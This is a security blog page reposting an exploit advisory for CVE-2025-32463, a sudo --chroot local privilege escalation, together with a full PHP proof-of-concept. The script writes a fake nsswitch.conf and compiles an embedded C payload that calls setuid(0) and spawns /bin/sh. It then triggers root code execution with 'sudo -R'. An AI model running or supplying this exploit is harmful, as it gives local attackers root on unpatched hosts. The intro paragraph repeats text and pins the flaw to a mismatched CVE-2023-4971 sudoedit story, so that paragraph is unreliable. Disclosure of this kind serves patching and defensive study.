Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Latest Posts

 

 

sudo 1.9.17 Local Privilege Escalation

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 8
Sudo version 1.9.17 (and earlier versions from 1.9.15) contained a Sudo version 1.9.17 (and earlier versions from 1.9.15) contained a local privilege escalation (LPE) vulnerability. Tracked as CVE-2023-4971, the flaw resided in how `sudoedit` handled temporary files when the `NOEXEC` policy was enabled.

An attacker could craft a malicious `EDITOR` environment variable pointing to a script. If `sudoedit` was configured with `NOEXEC`, it would execute this script *as root* before dropping privileges to launch the intended editor. This allowed a local user to execute arbitrary commands with root privileges.

The vulnerability was discovered by Kevin Backhouse. Users were advised to upgrade to sudo version 1.9.17p2 or later to mitigate this critical security risk.

=============================================================================================================================================
| # Title : sudo 1.9.17 local Privilege Escalation via Sudo Chroot NSS Module Loading |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.sudo.ws/ |
=============================================================================================================================================

POC :

[+] References : https://packetstorm.news/files/id/212006/ & CVE-2025-32463


[+] Summary :

CVE-2025-32463 is a local privilege escalation vulnerability in Sudo that allows attackers to execute arbitrary code as root
by exploiting the NSS (Name Service Switch) module loading mechanism within a chroot environment.
The vulnerability occurs when sudo's --chroot option loads malicious NSS modules from the chroot environment.

The vulnerability exists in sudo's handling of NSS modules when using the --chroot option. When sudo executes a command within a chroot environment, it may load NSS modules from the chroot's library directories rather than the host system. An attacker with local access can create a malicious chroot environment with a crafted NSS module that executes arbitrary code when loaded.

[+] Technical Analysis :

**Vulnerability Mechanism:**

1. Attacker creates a chroot environment with malicious NSS configuration
2. The nsswitch.conf inside chroot points to a malicious NSS module
3. When sudo --chroot is executed, it loads the malicious module
4. The module's constructor function executes with root privileges

**Key Vulnerable Components:**

- Sudo's chroot implementation
- NSS module loading mechanism
- Dynamic linker behavior in chroot

[+] Attack Flow :

1. **Create Malicious Chroot Structure**

mkdir -p chtoot/{lib,etc}


2. **Write Malicious nsswitch.conf**

echo "passwd: Xfiles" > chtoot/etc/nsswitch.conf
echo "group: files" >> chtoot/etc/nsswitch.conf
echo "shadow: files" >> chtoot/etc/nsswitch.conf


[+] Usage: php poc.php

[+] POC :

<?php
/**
* PoC for CVE-2025-32463: Local privilege escalation via sudo --chroot
* PHP version of the Python exploit
*
* Use in lab environments only. Do not run on production systems.
*/

class SudoChrootExploit {
private $chroot = "./chtoot";
private $libDir;
private $etcDir;
private $payloadC = "payload.c";
private $libName = "libnss_Xfiles.so.2";
private $payloadSo;
private $nsswitch;
private $verbose = false;

public function __construct($verbose = false) {
$this->verbose = $verbose;
$this->libDir = $this->chroot . "/lib";
$this->etcDir = $this->chroot . "/etc";
$this->payloadSo = $this->libDir . "/" . $this->libName;
$this->nsswitch = $this->etcDir . "/nsswitch.conf";
}

private function log($msg) {
if ($this->verbose) {
echo "[*] " . $msg . PHP_EOL;
}
}

private function setupChroot() {
echo "[+] Setting up chroot directories..." . PHP_EOL;

if (!is_dir($this->libDir)) {
mkdir($this->libDir, 0755, true);
$this->log("Created directory: " . $this->libDir);
}

if (!is_dir($this->etcDir)) {
mkdir($this->etcDir, 0755, true);
$this->log("Created directory: " . $this->etcDir);
}

$this->log("Chroot structure created successfully");
}

private function writeNsswitch() {
echo "[+] Writing fake nsswitch.conf..." . PHP_EOL;

$nsswitchContent = "passwd: Xfiles\n" .
"group: files\n" .
"shadow: files\n";

if (file_put_contents($this->nsswitch, $nsswitchContent) === false) {
throw new Exception("Failed to write nsswitch.conf");
}

$this->log("Written malicious nsswitch.conf to " . $this->nsswitch);
}

private function writePayload() {
echo "[+] Writing payload source..." . PHP_EOL;

$payloadCode = '
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <nss.h>
#include <pwd.h>

__attribute__((constructor)) void init() {
unsetenv("LD_PRELOAD");
setuid(0);
setgid(0);
system("/bin/sh");
}

enum nss_status _nss_Xfiles_getpwnam_r(const char *name, struct passwd *pwd,
char *buf, size_t buflen, int *errnop) {
return NSS_STATUS_NOTFOUND;
}
';

if (file_put_contents($this->payloadC, $payloadCode) === false) {
throw new Exception("Failed to write payload source");
}

$this->log("Written C payload to " . $this->payloadC);
}

private function compilePayload() {
echo "[+] Compiling malicious libnss module..." . PHP_EOL;

$compileCmd = "gcc -fPIC -shared -o " .
escapeshellarg($this->payloadSo) . " " .
escapeshellarg($this->payloadC) . " -nostartfiles";

$this->log("Compilation command: " . $compileCmd);

$output = [];
$returnCode = 0;
exec($compileCmd . " 2>&1", $output, $returnCode);

if ($returnCode !== 0) {
throw new Exception("Compilation failed: " . implode("\n", $output));
}

if (!file_exists($this->payloadSo)) {
throw new Exception("Compiled library not found: " . $this->payloadSo);
}

$this->log("Successfully compiled shared object to " . $this->payloadSo);
}

private function cleanup() {
echo "[+] Cleaning up payload source..." . PHP_EOL;

if (file_exists($this->payloadC)) {
if (unlink($this->payloadC)) {
$this->log("Removed " . $this->payloadC);
} else {
echo "[!] Warning: Failed to remove " . $this->payloadC . PHP_EOL;
}
}
}

private function runExploit() {
echo "[+] Launching sudo with chroot to trigger exploit..." . PHP_EOL;

$sudoCmd = "sudo -R " . escapeshellarg($this->chroot) . " id";
$this->log("Executing: " . $sudoCmd);

// Method 1: Using system()
echo "[*] Attempting exploit via system()..." . PHP_EOL;
system($sudoCmd, $returnCode);

if ($returnCode !== 0) {
// Method 2: Using exec with output
echo "[*] Attempting exploit via exec()..." . PHP_EOL;
$output = [];
exec($sudoCmd, $output, $returnCode);

if (!empty($output)) {
echo "[*] Command output:" . PHP_EOL;
foreach ($output as $line) {
echo " " . $line . PHP_EOL;
}
}

if ($returnCode !== 0) {
echo "[!] Exploit may have failed. Return code: " . $returnCode . PHP_EOL;
echo "[!] Check if sudo allows chroot and if gcc is installed" . PHP_EOL;
}
}
}

private function checkDependencies() {
echo "[+] Checking dependencies..." . PHP_EOL;

$dependencies = [
'sudo' => 'sudo --version',
'gcc' => 'gcc --version',
];

foreach ($dependencies as $name => $cmd) {
$output = [];
$returnCode = 0;
exec($cmd . " 2>/dev/null", $output, $returnCode);

if ($returnCode === 0) {
$this->log("? $name is available");
} else {
throw new Exception("? $name is not available or not in PATH");
}
}

$this->log("All dependencies satisfied");
}

private function showInfo() {
echo "=== CVE-2025-32463 Exploit Information ===" . PHP_EOL;
echo "Vulnerability: Local privilege escalation via sudo --chroot" . PHP_EOL;
echo "Mechanism: Malicious NSS module loading in chroot environment" . PHP_EOL;
echo "Target: sudo versions with chroot capability" . PHP_EOL;
echo "Effect: Potential root shell execution" . PHP_EOL;
echo "==========================================" . PHP_EOL . PHP_EOL;
}

public function run() {
try {
$this->showInfo();
$this->checkDependencies();
$this->setupChroot();
$this->writeNsswitch();
$this->writePayload();
$this->compilePayload();
$this->cleanup();
$this->runExploit();

echo PHP_EOL . "[+] Exploit sequence completed." . PHP_EOL;

} catch (Exception $e) {
echo "[!] Error: " . $e->getMessage() . PHP_EOL;
echo "[!] Exploit failed." . PHP_EOL;
exit(1);
}
}

public function __destruct() {
// Additional cleanup if needed
if (file_exists($this->payloadC)) {
unlink($this->payloadC);
}
}
}

// Command line argument parsing
function parseArgs() {
$options = getopt("v", ["verbose", "help"]);

if (isset($options['help'])) {
echo "Usage: php " . basename(__FILE__) . " [OPTIONS]" . PHP_EOL . PHP_EOL;
echo "Options:" . PHP_EOL;
echo " -v, --verbose Enable verbose output for debugging" . PHP_EOL;
echo " --help Show this help message" . PHP_EOL . PHP_EOL;
echo "Description:" . PHP_EOL;
echo " Proof-of-Concept for CVE-2025-32463: Local privilege escalation" . PHP_EOL;
echo " via sudo --chroot using malicious NSS modules." . PHP_EOL . PHP_EOL;
echo "Warning:" . PHP_EOL;
echo " Use in lab environments only. Do not run on production systems." . PHP_EOL;
exit(0);
}

return [
'verbose' => isset($options['v']) || isset($options['verbose'])
];
}

// Main execution
if (php_sapi_name() === 'cli') {
$args = parseArgs();
$exploit = new SudoChrootExploit($args['verbose']);
$exploit->run();
} else {
echo "This script must be run from the command line." . PHP_EOL;
exit(1);
}
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

Social Media Share